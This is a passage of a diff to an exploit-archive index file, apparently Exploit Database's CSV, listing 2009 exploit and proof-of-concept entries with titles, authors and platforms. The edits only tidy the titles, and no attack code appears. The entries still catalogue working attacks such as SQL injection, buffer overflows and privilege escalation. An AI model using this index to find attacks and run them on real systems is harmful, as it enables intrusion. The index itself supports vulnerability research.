Vulnerability",2009-07-10,darkjoker,php,webapps,0 @@ -8605,12 +8605,12 @@ id,file,description,date,author,platform,type,port 9122,platforms/php/webapps/9122.txt,"Opial 1.0 - Arbitrary File Upload/XSS/SQL Injection Vulnerabilities",2009-07-11,LMaster,php,webapps,0 9123,platforms/windows/dos/9123.pl,"M3U/M3L to ASX/WPL 1.1 - (ASX,M3U,M3L) Local BOF PoC",2009-07-11,"ThE g0bL!N",windows,dos,0 9124,platforms/windows/dos/9124.pl,"Playlistmaker 1.5 (.M3U/M3L/TXT File) Local Stack Overflow PoC",2009-07-11,"ThE g0bL!N",windows,dos,0 -9125,platforms/php/webapps/9125.txt,"Ebay Clone 2009 Multiple SQL Injection Vulnerabilities",2009-07-11,MizoZ,php,webapps,0 +9125,platforms/php/webapps/9125.txt,"Ebay Clone 2009 - Multiple SQL Injection Vulnerabilities",2009-07-11,MizoZ,php,webapps,0 9126,platforms/php/webapps/9126.txt,"Joomla Component com_category (catid) SQL Injection Vulnerability",2009-07-11,Prince_Pwn3r,php,webapps,0 9127,platforms/php/webapps/9127.txt,"d.net CMS Arbitrary Reinstall/Blind SQL Injection Exploit",2009-07-11,darkjoker,php,webapps,0 9128,platforms/windows/remote/9128.py,"Pirch IRC 98 Client - (response) Remote BOF Exploit (SEH)",2009-07-12,His0k4,windows,remote,0 9129,platforms/php/webapps/9129.txt,"censura 1.16.04 (bsql/xss) Multiple Vulnerabilities",2009-07-12,Vrs-hCk,php,webapps,0 -9130,platforms/php/webapps/9130.txt,"Php AdminPanel Free version 1.0.5 - Remote File Disclosure Vuln",2009-07-12,IRCRASH,php,webapps,0 +9130,platforms/php/webapps/9130.txt,"Php AdminPanel Free 1.0.5 - Remote File Disclosure Vuln",2009-07-12,IRCRASH,php,webapps,0 9131,platforms/windows/dos/9131.py,"Tandberg MXP F7.0 (USER) Remote Buffer Overflow PoC",2009-07-13,otokoyama,windows,dos,0 9132,platforms/php/webapps/9132.py,"RunCMS <= 1.6.3 (double ext) Remote Shell Injection Exploit",2009-07-13,StAkeR,php,webapps,0 9133,platforms/windows/dos/9133.pl,"ScITE Editor 1.72 Local Crash Vulnerability Exploit",2009-07-13,prodigy,windows,dos,0 @@ -8622,8 +8622,8 @@ id,file,description,date,author,platform,type,port 9139,platforms/windows/remote/9139.pl,"JetAudio 7.5.3 COWON Media Center (.wav File) Crash Exploit",2009-07-14,prodigy,windows,remote,0 9140,platforms/cgi/webapps/9140.txt,"DJ Calendar (DJcalendar.cgi TEMPLATE) File Disclosure Vuln",2009-07-14,cibbao,cgi,webapps,0 9141,platforms/windows/dos/9141.pl,"Icarus 2.0 (.ICP File) Local Stack Overflow PoC",2009-07-14,"ThE g0bL!N",windows,dos,0 -9142,platforms/windows/local/9142.c,"Live For Speed 2 Version Z .Mpr - Local buffer Overflow Exploit",2009-07-14,n00b,windows,local,0 -9143,platforms/linux/remote/9143.txt,"Virtualmin < 3.703 Multiple Local/Remote Vulnerabilities",2009-07-14,"Filip Palian",linux,remote,0 +9142,platforms/windows/local/9142.c,"Live For Speed 2 Version Z .Mpr - Local Buffer Overflow Exploit",2009-07-14,n00b,windows,local,0 +9143,platforms/linux/remote/9143.txt,"Virtualmin < 3.703 - Multiple Local/Remote Vulnerabilities",2009-07-14,"Filip Palian",linux,remote,0 9144,platforms/php/webapps/9144.txt,"Mobilelib Gold 3.0 - Local File Disclosure Vulnerability",2009-07-14,Qabandi,php,webapps,0 9145,platforms/php/webapps/9145.php,"Traidnt UP 2.0 - Remote Blind SQL Injection Exploit",2009-07-14,Qabandi,php,webapps,0 9146,platforms/windows/local/9146.pl,"Icarus 2.0 (.ICP File) Local Stack Overflow Exploit",2009-07-14,[0]x80->[H]4x²0r,windows,local,0 @@ -8631,7 +8631,7 @@ id,file,description,date,author,platform,type,port 9148,platforms/windows/local/9148.py,"Live For Speed 2 Version Z - (.mpr) Buffer Overflow Exploit (SEH)",2009-07-14,His0k4,windows,local,0 9149,platforms/windows/local/9149.pl,"Icarus 2.0 (.ICP File) Local Buffer Overflow Exploit (SEH)",2009-07-15,hack4love,windows,local,0 9150,platforms/php/webapps/9150.txt,"WordPress Plugin My Category Order <= 2.8 - SQL Injection Vulnerability",2009-07-15,"Manh Luat",php,webapps,0 -9151,platforms/php/webapps/9151.txt,"ILIAS LMS <= 3.9.9/3.10.7 Arbitrary Edition/Info Disclosure Vulns",2009-07-15,YEnH4ckEr,php,webapps,0 +9151,platforms/php/webapps/9151.txt,"ILIAS Lms <= 3.9.9/3.10.7 Arbitrary Edition/Info Disclosure Vulns",2009-07-15,YEnH4ckEr,php,webapps,0 9152,platforms/windows/local/9152.pl,"AudioPLUS 2.00.215 (.m3u .lst) Universal SEH Overwrite Exploit",2009-07-15,Stack,windows,local,0 9153,platforms/php/webapps/9153.txt,"Admin News Tools 2.5 (fichier) Remote File Disclosure Vulnerability",2009-07-15,Securitylab.ir,php,webapps,0 9154,platforms/php/webapps/9154.js,"ZenPhoto 1.2.5 Completely Blind SQL Injection Exploit",2009-07-15,petros,php,webapps,0 @@ -8647,10 +8647,10 @@ id,file,description,date,author,platform,type,port 9164,platforms/php/webapps/9164.txt,"webLeague 2.2.0 (install.php) Remote Change Password Exploit",2009-07-16,TiGeR-Dz,php,webapps,0 9165,platforms/php/webapps/9165.pl,"webLeague 2.2.0 (Auth Bypass) Remote SQL Injection Exploit",2009-07-16,ka0x,php,webapps,0 9166,platforms/php/webapps/9166.txt,"ZenPhoto Gallery 1.2.5 Admin Password Reset (CRSF)",2009-07-16,petros,php,webapps,0 -9167,platforms/windows/dos/9167.txt,"Music Tag Editor 1.61 build 212 Remote Buffer Overflow PoC",2009-07-16,LiquidWorm,windows,dos,0 +9167,platforms/windows/dos/9167.txt,"Music Tag Editor 1.61 build 212 - Remote Buffer Overflow PoC",2009-07-16,LiquidWorm,windows,dos,0 9168,platforms/windows/dos/9168.pl,"Zortam MP3 Player 1.50 (m3u) Integer Division by Zero Exploit",2009-07-16,LiquidWorm,windows,dos,0 -9169,platforms/windows/dos/9169.txt,"Zortam MP3 Media Studio 9.40 Multiple Memory Corruption Vulns",2009-07-16,LiquidWorm,windows,dos,0 -9170,platforms/windows/dos/9170.txt,"Audio Editor Pro 2.91 Remote Memory Corruption PoC",2009-07-16,LiquidWorm,windows,dos,0 +9169,platforms/windows/dos/9169.txt,"Zortam MP3 Media Studio 9.40 - Multiple Memory Corruption Vulns",2009-07-16,LiquidWorm,windows,dos,0 +9170,platforms/windows/dos/9170.txt,"Audio Editor Pro 2.91 - Remote Memory Corruption PoC",2009-07-16,LiquidWorm,windows,dos,0 9171,platforms/php/webapps/9171.txt,"VS PANEL 7.5.5 (results.php Cat_ID) SQL Injection Vulnerability",2009-07-16,C0D3R-Dz,php,webapps,0 9172,platforms/windows/local/9172.pl,"Hamster Audio Player 0.3a Universal Buffer Overflow Exploit (SEH)",2009-07-16,"ThE g0bL!N",windows,local,0 9173,platforms/windows/dos/9173.pl,"MultiMedia Jukebox 4.0 Build 020124 (.pst / .m3u) Heap Overflow PoC",2009-07-16,hack4love,windows,dos,0 @@ -8699,7 +8699,7 @@ id,file,description,date,author,platform,type,port 9221,platforms/windows/local/9221.pl,"WINMOD 1.4 - (.lst) Local Buffer Overflow Exploit (SEH)",2009-07-21,hack4love,windows,local,0 9222,platforms/windows/dos/9222.cpp,"FlyHelp (.CHM File) Local Buffer Overflow PoC",2009-07-21,"fl0 fl0w",windows,dos,0 9223,platforms/windows/local/9223.txt,"Adobe Acrobat 9.1.2 NOS Local Privilege Escalation Exploit",2009-07-21,"Jeremy Brown",windows,local,0 -9224,platforms/windows/remote/9224.py,"MS Office Web Components Spreadsheet ActiveX (OWC10/11) Exploit",2009-07-21,"Ahmed Obied",windows,remote,0 +9224,platforms/windows/remote/9224.py,"Microsoft Office Web Components Spreadsheet ActiveX (OWC10/11) Exploit",2009-07-21,"Ahmed Obied",windows,remote,0 9225,platforms/php/webapps/9225.txt,"AnotherPHPBook (APB) 1.3.0 (Auth Bypass) - SQL Injection Vulnerability",2009-07-21,n3w7u,php,webapps,0 9226,platforms/php/webapps/9226.txt,"phpdirectorysource (xss/sql) Multiple Vulnerabilities",2009-07-21,Moudi,php,webapps,0 9227,platforms/php/webapps/9227.txt,"Meta Search Engine Script (url) Local File Disclosure Vulnerability",2009-07-21,Moudi,php,webapps,0 @@ -8725,7 +8725,7 @@ id,file,description,date,author,platform,type,port 9250,platforms/php/webapps/9250.sh,"Wordpress 2.8.1 (url) Remote Cross Site Scripting Exploit",2009-07-24,superfreakaz0rz,php,webapps,0 9251,platforms/php/webapps/9251.txt,"Deonixscripts Templates Management 1.3 - SQL Injection Vulnerability",2009-07-24,d3b4g,php,webapps,0 9252,platforms/php/webapps/9252.txt,"Scripteen Free Image Hosting Script 2.3 - SQL Injection Exploit",2009-07-24,Coksnuss,php,webapps,0 -9253,platforms/windows/dos/9253.html,"MS Internet Explorer 7/8 findText Unicode Parsing Crash Exploit",2009-07-24,Hong10,windows,dos,0 +9253,platforms/windows/dos/9253.html,"Microsoft Internet Explorer 7/8 findText Unicode Parsing Crash Exploit",2009-07-24,Hong10,windows,dos,0 9254,platforms/php/webapps/9254.txt,"PHP Live! <= 3.2.2 (questid) Remote SQL Injection Vulnerability",2009-07-24,skys,php,webapps,0 9255,platforms/php/webapps/9255.txt,"Clip Bucket <= 1.7.1 Insecure Cookie Handling Vulnerability",2009-07-24,Qabandi,php,webapps,0 9256,platforms/php/webapps/9256.txt,"Scripteen Free Image Hosting Script 2.3 Insecure Cookie Handling Vuln",2009-07-24,Qabandi,php,webapps,0 @@ -8735,15 +8735,15 @@ id,file,description,date,author,platform,type,port 9260,platforms/php/webapps/9260.txt,"skadate dating (rfi/lfi/xss) Multiple Vulnerabilities",2009-07-27,Moudi,php,webapps,0 9261,platforms/php/webapps/9261.txt,"xoops celepar module qas (bsql/xss) Multiple Vulnerabilities",2009-07-27,Moudi,php,webapps,0 9262,platforms/php/webapps/9262.txt,"garagesalesjunkie (sql/xss) Multiple Vulnerabilities",2009-07-27,Moudi,php,webapps,0 -9263,platforms/php/webapps/9263.txt,"URA 3.0 (cat) remote SQL injection Vulnerability",2009-07-27,"Chip d3 bi0s",php,webapps,0 +9263,platforms/php/webapps/9263.txt,"URA 3.0 (cat) remote SQL Injection Vulnerability",2009-07-27,"Chip d3 bi0s",php,webapps,0 9264,platforms/linux/dos/9264.py,"stftp <= 1.10 - (PWD Response) Remote Stack Overflow PoC",2009-07-27,sqlevil,linux,dos,0 -9265,platforms/linux/dos/9265.c,"ISC DHCP dhclient < 3.1.2p1 Remote Buffer Overflow PoC",2009-07-27,"Jon Oberheide",linux,dos,0 +9265,platforms/linux/dos/9265.c,"ISC DHCP dhclient < 3.1.2p1 - Remote Buffer Overflow PoC",2009-07-27,"Jon Oberheide",linux,dos,0 9266,platforms/php/webapps/9266.txt,"iwiccle 1.01 (lfi/sql) Multiple Vulnerabilities",2009-07-27,SirGod,php,webapps,0 9267,platforms/php/webapps/9267.txt,"VS PANEL 7.5.5 (Cat_ID) SQL Injection Vulnerability (patched?)",2009-07-27,octopos,php,webapps,0 9268,platforms/hardware/dos/9268.rb,"Cisco WLC 4402 - Basic Auth Remote Denial of Service (meta)",2009-07-27,"Christoph Bott",hardware,dos,0 9269,platforms/php/webapps/9269.txt,"PHP Paid 4 Mail Script (home.php page) Remote File Inclusion Vuln",2009-07-27,int_main();,php,webapps,0 9270,platforms/php/webapps/9270.txt,"Super Mod System 3.0 - (s) SQL Injection Vulnerability",2009-07-27,MizoZ,php,webapps,0 -9271,platforms/php/webapps/9271.txt,"Inout Adserver (id) Remote SQL injection Vulnerability",2009-07-27,boom3rang,php,webapps,0 +9271,platforms/php/webapps/9271.txt,"Inout Adserver (id) Remote SQL Injection Vulnerability",2009-07-27,boom3rang,php,webapps,0 9272,platforms/windows/local/9272.py,"Adobe Acrobat 9.1.2 NOS Local Privilege Escalation Exploit (py)",2009-07-27,Dr_IDE,windows,local,0 9273,platforms/php/webapps/9273.php,"Allomani Mobile 2.5 - Remote Blind SQL Injection Exploit",2009-07-27,Qabandi,php,webapps,0 9274,platforms/php/webapps/9274.php,"Allomani Songs & Clips 2.7.0 - Blind SQL Injection Exploit",2009-07-27,Qabandi,php,webapps,0 @@ -8755,7 +8755,7 @@ id,file,description,date,author,platform,type,port 9280,platforms/php/webapps/9280.pl,"PunBB Automatic Image Upload <= 1.3.5 Delete Arbitrary File Exploit",2009-07-27,Dante90,php,webapps,0 9281,platforms/php/webapps/9281.txt,"Limny 1.01 (Auth Bypass) SQL Injection Vulnerability",2009-07-27,SirGod,php,webapps,0 9282,platforms/php/webapps/9282.txt,"Magician Blog <= 1.0 (ids) Remote SQL Injection Vulnerability",2009-07-27,Evil-Cod3r,php,webapps,0 -9283,platforms/php/webapps/9283.txt,"Magician Blog <= 1.0 (Auth Bypass) SQL injection Vulnerability",2009-07-27,Evil-Cod3r,php,webapps,0 +9283,platforms/php/webapps/9283.txt,"Magician Blog <= 1.0 (Auth Bypass) SQL Injection Vulnerability",2009-07-27,Evil-Cod3r,php,webapps,0 9284,platforms/php/webapps/9284.txt,"SerWeb <= 2.1.0-dev1 2009-07-02 - Multiple RFI Vulnerabilities",2009-07-27,GoLd_M,php,webapps,0 9286,platforms/windows/local/9286.pl,"MP3 Studio 1.0 (.mpf /.m3u File) Local Stack Overflow Exploit (SEH)",2009-07-28,corelanc0d3r,windows,local,0 9287,platforms/php/webapps/9287.txt,"PHP Paid 4 Mail Script (paidbanner.php ID) SQL Injection Vulnerability",2009-07-28,"ThE g0bL!N",php,webapps,0 @@ -8771,7 +8771,7 @@ id,file,description,date,author,platform,type,port 9297,platforms/php/webapps/9297.txt,"ultrize timesheet 1.2.2 - Remote File Inclusion Vulnerability",2009-07-28,NoGe,php,webapps,0 9298,platforms/windows/local/9298.pl,"Millenium MP3 Studio 1.0 .mpf File Local Stack Overflow Exploit (update)",2009-07-30,corelanc0d3r,windows,local,0 9299,platforms/windows/local/9299.pl,"WINMOD 1.4 - (.lst) Local Stack Overflow Exploit XP SP3 (RET+SEH) (3)",2009-07-28,corelanc0d3r,windows,local,0 -9300,platforms/multiple/dos/9300.c,"ISC BIND 9 Remote Dynamic Update Message Denial of Service PoC",2009-07-30,kingcope,multiple,dos,0 +9300,platforms/multiple/dos/9300.c,"ISC BIND 9 - Remote Dynamic Update Message Denial of Service PoC",2009-07-30,kingcope,multiple,dos,0 9301,platforms/windows/local/9301.txt,"Microsoft Windows XP - (win32k.sys) Local Privilege Escalation Exploit",2009-07-30,"NT Internals",windows,local,0 9302,platforms/linux/local/9302.py,"Compface 1.1.5 (.xbm File) Local Buffer Overflow Exploit",2009-07-30,His0k4,linux,local,0 9303,platforms/windows/remote/9303.c,"VLC Media Player 0.8.6f smb:// URI Handling Remote BOF Exploit",2009-07-30,"Pankaj Kohli",windows,remote,0 @@ -8833,7 +8833,7 @@ id,file,description,date,author,platform,type,port 9359,platforms/windows/dos/9359.pl,"jetAudio 7.1.9.4030 plus vx (.m3u) Local Buffer Overflow PoC",2009-08-04,hack4love,windows,dos,0 9360,platforms/windows/local/9360.pl,"BlazeDVD 5.1/HDTV Player 6.0 (.PLF File) Universal BOF Exploit (SEH)",2009-08-04,"ThE g0bL!N",windows,local,0 9361,platforms/windows/dos/9361.pl,"RadASM 2.2.1.6 Menu Editor (.mnu) Stack Overflow PoC",2009-08-04,"Pankaj Kohli",windows,dos,0 -9362,platforms/windows/dos/9362.html,"MS Internet Explorer 8.0.7100.0 Simple HTML Remote Crash PoC",2009-08-05,schnuddelbuddel,windows,dos,0 +9362,platforms/windows/dos/9362.html,"Microsoft Internet Explorer 8.0.7100.0 Simple HTML Remote Crash PoC",2009-08-05,schnuddelbuddel,windows,dos,0 9363,platforms/linux/local/9363.c,"Linux Kernel < 2.6.14.6 procfs Kernel Memory Disclosure Exploit",2009-08-05,"Jon Oberheide",linux,local,0 9364,platforms/windows/local/9364.py,"Tuniac v.090517c (.M3U File) Local File Crash PoC",2009-08-05,Dr_IDE,windows,local,0 9365,platforms/php/webapps/9365.txt,"mybackup 1.4.0 (afd/rfi) Multiple Vulnerabilities",2009-08-05,SirGod,php,webapps,0 @@ -8877,7 +8877,7 @@ id,file,description,date,author,platform,type,port 9408,platforms/php/webapps/9408.php,"Joomla Component Kunena Forums (com_kunena) bSQL Injection Exploit",2009-08-10,"ilker Kandemir",php,webapps,0 9409,platforms/windows/local/9409.pl,"MediaCoder 0.7.1.4490 (.lst/.m3u) Universal BOF Exploit (SEH)",2009-08-10,hack4love,windows,local,0 9410,platforms/php/webapps/9410.txt,"Wordpress <= 2.8.3 - Remote Admin Reset Password Vulnerability",2009-08-11,"laurent gaffié ",php,webapps,0 -9411,platforms/windows/dos/9411.cpp,"Embedthis Appweb 3.0b.2-4 Remote Buffer Overflow PoC",2009-08-11,"fl0 fl0w",windows,dos,0 +9411,platforms/windows/dos/9411.cpp,"Embedthis Appweb 3.0b.2-4 - Remote Buffer Overflow PoC",2009-08-11,"fl0 fl0w",windows,dos,0 9412,platforms/windows/local/9412.pl,"Easy Music Player 1.0.0.2 - (wav) Universal Local Buffer Exploit (SEH)",2009-08-11,ahwak2000,windows,local,0 9413,platforms/php/webapps/9413.txt,"Joomla Component idoblog 1.1b30 (com_idoblog) SQL Injection Vuln",2009-08-11,kkr,php,webapps,0 9416,platforms/php/webapps/9416.txt,"OCS Inventory NG 1.2.1 (systemid) SQL Injection Vulnerability",2009-08-11,"Guilherme Marinheiro",php,webapps,0 @@ -8887,7 +8887,7 @@ id,file,description,date,author,platform,type,port 9420,platforms/windows/local/9420.pl,"Easy Music Player 1.0.0.2 - (wav) Universal Local Buffer Exploit (SEH) (3)",2009-08-12,hack4love,windows,local,0 9421,platforms/php/webapps/9421.txt,"Gallarific 1.1 (gallery.php) Arbitrary Delete/Edit Category Vuln",2009-08-12,"ilker Kandemir",php,webapps,0 9422,platforms/hardware/remote/9422.txt,"2WIRE Gateway - Authentication Bypass & Password Reset Vulnerabilities",2009-08-12,hkm,hardware,remote,0 -9423,platforms/windows/dos/9423.pl,"MS Wordpad on winXP SP3 Local Crash Exploit",2009-08-12,murderkey,windows,dos,0 +9423,platforms/windows/dos/9423.pl,"Microsoft Wordpad on winXP SP3 - Local Crash Exploit",2009-08-12,murderkey,windows,dos,0 9424,platforms/php/webapps/9424.txt,"Plume CMS 1.2.3 - Multiple SQL Injection Vulnerabilities",2009-08-12,"Sense of Security",php,webapps,0 9425,platforms/php/webapps/9425.sh,"Gazelle CMS 1.0 - Multiple Vulnerabilities / RCE Exploit",2009-08-12,IHTeam,php,webapps,0 9426,platforms/windows/local/9426.java,"FTPShell Client 4.1 RC2 Name Session Stack Overflow Exploit",2009-08-13,zec,windows,local,0 @@ -8905,9 +8905,9 @@ id,file,description,date,author,platform,type,port 9438,platforms/php/webapps/9438.txt,"PHP Competition System <= 0.84 (competition) SQL Injection Vuln",2009-08-14,Mr.SQL,php,webapps,0 9440,platforms/php/webapps/9440.txt,"DS CMS 1.0 (nFileId) Remote SQL Injection Vulnerability",2009-08-14,Mr.tro0oqy,php,webapps,0 9441,platforms/php/webapps/9441.txt,"MyWeight 1.0 - Remote Shell Upload Vulnerability",2009-08-14,Mr.tro0oqy,php,webapps,0 -9442,platforms/linux/dos/9442.c,"Linux Kernel < 2.6.30.5 cfg80211 Remote Denial of Service Exploit",2009-08-18,"Jon Oberheide",linux,dos,0 +9442,platforms/linux/dos/9442.c,"Linux Kernel < 2.6.30.5 cfg80211 - Remote Denial of Service Exploit",2009-08-18,"Jon Oberheide",linux,dos,0 9443,platforms/windows/remote/9443.txt,"Adobe JRun 4 (logfile) Directory Traversal Vulnerability (auth)",2009-08-18,DSecRG,windows,remote,0 -9444,platforms/php/webapps/9444.txt,"PHP-Lance 1.52 Multiple Local File Inclusion Vulnerabilities",2009-08-18,jetli007,php,webapps,0 +9444,platforms/php/webapps/9444.txt,"PHP-Lance 1.52 - Multiple Local File Inclusion Vulnerabilities",2009-08-18,jetli007,php,webapps,0 9445,platforms/php/webapps/9445.py,"BaBB 2.8 - Remote Code Injection Exploit",2009-08-18,IRCRASH,php,webapps,0 9446,platforms/windows/dos/9446.cpp,"HTML Email Creator & Sender 2.3 - Local Buffer Overflow PoC (SEH)",2009-08-18,"fl0 fl0w",windows,dos,0 9447,platforms/php/webapps/9447.pl,"AJ Auction Pro OOPD 2.x - (store.php id) SQL Injection Exploit",2009-08-18,NoGe,php,webapps,0 @@ -8918,13 +8918,13 @@ id,file,description,date,author,platform,type,port 9452,platforms/php/webapps/9452.pl,"Arcadem Pro 2.8 (article) Blind SQL Injection Exploit",2009-08-18,Mr.SQL,php,webapps,0 9453,platforms/php/webapps/9453.txt,"Videos Broadcast Yourself 2 - (UploadID) SQL Injection Vuln",2009-08-18,Mr.SQL,php,webapps,0 9454,platforms/multiple/dos/9454.txt,"Safari 4.0.2 - (WebKit Parsing of Floating Point Numbers) BOF PoC",2009-08-18,"Leon Juranic",multiple,dos,0 -9455,platforms/windows/dos/9455.html,"MS Internet Explorer (Javascript SetAttribute) Remote Crash Exploit",2009-08-18,"Irfan Asrar",windows,dos,0 +9455,platforms/windows/dos/9455.html,"Microsoft Internet Explorer (Javascript SetAttribute) Remote Crash Exploit",2009-08-18,"Irfan Asrar",windows,dos,0 9456,platforms/hardware/remote/9456.txt,"ZTE ZXDSL 831 II Modem Arbitrary Add Admin User Vulnerability",2009-08-18,SuNHouSe2,hardware,remote,0 9457,platforms/windows/dos/9457.pl,"broid 1.0 Beta 3a (.mp3 File) Local Buffer Overflow PoC",2009-08-18,hack4love,windows,dos,0 9458,platforms/windows/local/9458.pl,"Xenorate Media Player 2.6.0.0 (.xpl) Universal Local Buffer Exploit (SEH)",2009-08-18,hack4love,windows,local,0 9459,platforms/php/webapps/9459.txt,"2WIRE Gateway - Auth Bypass & Password Reset Vulnerabilities (2)",2009-08-18,bugz,php,webapps,0 9460,platforms/php/webapps/9460.txt,"autonomous lan party <= 0.98.3 - Remote File Inclusion Vulnerability",2009-08-18,"cr4wl3r ",php,webapps,0 -9461,platforms/php/webapps/9461.txt,"E Cms <= 1.0 (index.php s) Remote SQL Injection Vulnerability",2009-08-18,Red-D3v1L,php,webapps,0 +9461,platforms/php/webapps/9461.txt,"E CMS <= 1.0 (index.php s) Remote SQL Injection Vulnerability",2009-08-18,Red-D3v1L,php,webapps,0 9462,platforms/php/webapps/9462.txt,"Infinity <= 2.x.x options[style_dir] Local File Disclosure Vulnerability",2009-08-18,SwEET-DeViL,php,webapps,0 9463,platforms/php/webapps/9463.php,"Joomla Component MisterEstate Blind SQL Injection Exploit",2009-08-18,jdc,php,webapps,0 9464,platforms/php/webapps/9464.txt,"Fotoshow PRO (category) Remote SQL Injection Vulnerability",2009-08-18,darkmasking,php,webapps,0 @@ -8963,12 +8963,12 @@ id,file,description,date,author,platform,type,port 9497,platforms/php/webapps/9497.pl,"ITechBids 8.0 (itechd.php productid) Blind SQL Injection Exploit",2009-08-24,Mr.SQL,php,webapps,0 9498,platforms/hardware/remote/9498.txt,"Netgear WNR2000 FW 1.2.0.8 Information Disclsoure Vulnerabilities",2009-08-24,"Jean Trolleur",hardware,remote,0 9499,platforms/php/webapps/9499.txt,"New5starRating 1.0 (rating.php) SQL Injection Vulnerability",2009-08-24,Bgh7,php,webapps,0 -9500,platforms/windows/remote/9500.cpp,"NaviCopa Web Server 3.01 Remote Buffer Overflow Exploit",2009-08-24,SimO-s0fT,windows,remote,0 +9500,platforms/windows/remote/9500.cpp,"NaviCopa Web Server 3.01 - Remote Buffer Overflow Exploit",2009-08-24,SimO-s0fT,windows,remote,0 9501,platforms/windows/local/9501.py,"Audacity <= 1.2 (.gro File) Universal BOF Exploit (egg hunter)",2009-08-24,mr_me,windows,local,0 9502,platforms/php/webapps/9502.txt,"Joomla Component com_ninjamonial 1.1 (testimID) SQL Injection Vuln",2009-08-24,"Chip d3 bi0s",php,webapps,0 9503,platforms/hardware/remote/9503.txt,"Huawei SmartAX MT880 - Multiple CSRF Vulnerabilities",2009-08-24,"Jerome Athias",hardware,remote,0 -9504,platforms/php/webapps/9504.txt,"Joomla Component com_jtips 1.0.x (season) bSQL Injection Vuln",2009-08-24,"Chip d3 bi0s",php,webapps,0 -9505,platforms/php/webapps/9505.txt,"Geeklog <= 1.6.0sr1 Remote Arbitrary File Upload Vulnerability",2009-08-24,JaL0h,php,webapps,0 +9504,platforms/php/webapps/9504.txt,"Joomla Component com_jtips 1.0.x - (season) bSQL Injection Vuln",2009-08-24,"Chip d3 bi0s",php,webapps,0 +9505,platforms/php/webapps/9505.txt,"Geeklog <= 1.6.0sr1 - Remote Arbitrary File Upload Vulnerability",2009-08-24,JaL0h,php,webapps,0 9506,platforms/windows/dos/9506.pl,"FLIP Flash Album Deluxe 1.8.407.1 (.fft File) Crash PoC",2009-08-24,the_Edit0r,windows,dos,0 9507,platforms/windows/dos/9507.pl,"AiO (All into One) Flash Mixer 3 (.afp File) Crash PoC",2009-08-24,the_Edit0r,windows,dos,0 9508,platforms/windows/remote/9508.rb,"ProFTP 2.9 (welcome message) Remote Buffer Overflow Exploit (meta)",2009-08-25,His0k4,windows,remote,0 @@ -9057,7 +9057,7 @@ id,file,description,date,author,platform,type,port 9594,platforms/windows/dos/9594.txt,"Windows Vista/7 SMB2.0 Negotiate Protocol Request Remote BSOD Vuln",2009-09-09,"laurent gaffie",windows,dos,0 9595,platforms/linux/local/9595.c,"HTMLDOC 1.8.27 (html File Handling) Stack Buffer Overflow Exploit",2009-09-09,"Pankaj Kohli",linux,local,0 9596,platforms/windows/remote/9596.py,"SIDVault 2.0e Windows Universal Buffer Overflow Exploit (SEH)",2009-09-09,SkuLL-HackeR,windows,remote,389 -9597,platforms/windows/dos/9597.txt,"Novell eDirectory 8.8 SP5 Remote Denial of Service Exploit",2009-09-09,karak0rsan,windows,dos,0 +9597,platforms/windows/dos/9597.txt,"Novell eDirectory 8.8 SP5 - Remote Denial of Service Exploit",2009-09-09,karak0rsan,windows,dos,0 9598,platforms/linux/local/9598.txt,"Linux Kernel 2.4 / 2.6 - sock_sendpage() Local Root Exploit (2)",2009-09-09,"Ramon Valle",linux,local,0 9599,platforms/php/webapps/9599.txt,"The Rat CMS Alpha 2 Arbitrary File Upload Vulnerability",2009-09-09,Securitylab.ir,php,webapps,0 9600,platforms/php/webapps/9600.txt,"OBOphiX <= 2.7.0 (fonctions_racine.php) Remote File Inclusion Vuln",2009-09-09,"EA Ngel",php,webapps,0 @@ -9073,7 +9073,7 @@ id,file,description,date,author,platform,type,port 9610,platforms/windows/local/9610.py,"Audio Lib Player (m3u File) Buffer Overflow Exploit (SEH)",2009-09-09,blake,windows,local,0 9611,platforms/php/webapps/9611.txt,"phpNagios 1.2.0 (menu.php) Local File Inclusion Vulnerability",2009-09-09,CoBRa_21,php,webapps,0 9612,platforms/asp/webapps/9612.txt,"ChartDirector 5.0.1 (cacheId) Arbitrary File Disclosure Vulnerability",2009-09-09,DokFLeed,asp,webapps,0 -9613,platforms/windows/remote/9613.py,"FTPShell Client 4.1 RC2 Remote Buffer Overflow Exploit (univ)",2009-09-09,His0k4,windows,remote,0 +9613,platforms/windows/remote/9613.py,"FTPShell Client 4.1 RC2 - Remote Buffer Overflow Exploit (univ)",2009-09-09,His0k4,windows,remote,0 9615,platforms/windows/remote/9615.jar,"Pidgin MSN <= 2.5.8 - Remote Code Execution Exploit",2009-09-09,"Pierre Nogues",windows,remote,0 9617,platforms/windows/dos/9617.txt,"Dnsmasq < 2.50 - Heap Overflow & Null pointer Dereference Vulns",2009-09-09,"Core Security",windows,dos,0 9618,platforms/windows/local/9618.php,"Millenium MP3 Studio (pls/mpf/m3u) Local Universal BOF Exploits (SEH)",2009-09-09,hack4love,windows,local,0 @@ -9101,7 +9101,7 @@ id,file,description,date,author,platform,type,port 9640,platforms/php/webapps/9640.txt,"gyro 5.0 (sql/xss) Multiple Vulnerabilities",2009-09-11,OoN_Boy,php,webapps,0 9641,platforms/linux/local/9641.txt,"Linux Kernel 2.4 / 2.6 - sock_sendpage() Local Root Exploit (3)",2009-09-11,"Ramon Valle",linux,local,0 9642,platforms/multiple/dos/9642.py,"FreeRadius < 1.1.8 - Zero-length Tunnel-Password DoS Exploit",2009-09-11,"Matthew Gillespie",multiple,dos,1812 -9643,platforms/windows/remote/9643.txt,"kolibri+ webserver 2 - Directory Traversal vulnerability",2009-09-11,"Usman Saeed",windows,remote,0 +9643,platforms/windows/remote/9643.txt,"kolibri+ webserver 2 - Directory Traversal Vulnerability",2009-09-11,"Usman Saeed",windows,remote,0 9644,platforms/windows/remote/9644.py,"Kolibri+ Webserver 2 - (GET Request) Remote SEH Overwrite Exploit",2009-09-11,blake,windows,remote,80 9645,platforms/aix/local/9645.sh,"IBM AIX 5.6/6.1 - _LIB_INIT_DBG Arbitrary File Overwrite via Libc Debug",2009-09-11,"Marco Ivaldi",aix,local,0 9646,platforms/hardware/dos/9646.php,"Siemens Gigaset SE361 WLAN Remote Reboot Exploit",2009-09-11,crashbrz,hardware,dos,0 @@ -9131,11 +9131,11 @@ id,file,description,date,author,platform,type,port 9670,platforms/windows/dos/9670.txt,"FotoTagger 2.12.0.0 (.XML File) Buffer Overflow PoC",2009-09-14,the_Edit0r,windows,dos,0 9671,platforms/windows/dos/9671.py,"Tuniac v.090517c (.PLS File) Local Crash PoC",2009-09-14,zAx,windows,dos,0 9672,platforms/windows/dos/9672.py,"PowerISO 4.0 - Local Buffer Overflow PoC",2009-09-14,Dr_IDE,windows,dos,0 -9673,platforms/windows/remote/9673.py,"BigAnt Server 2.50 - GET Request Remote BOF Exploit (SEH) 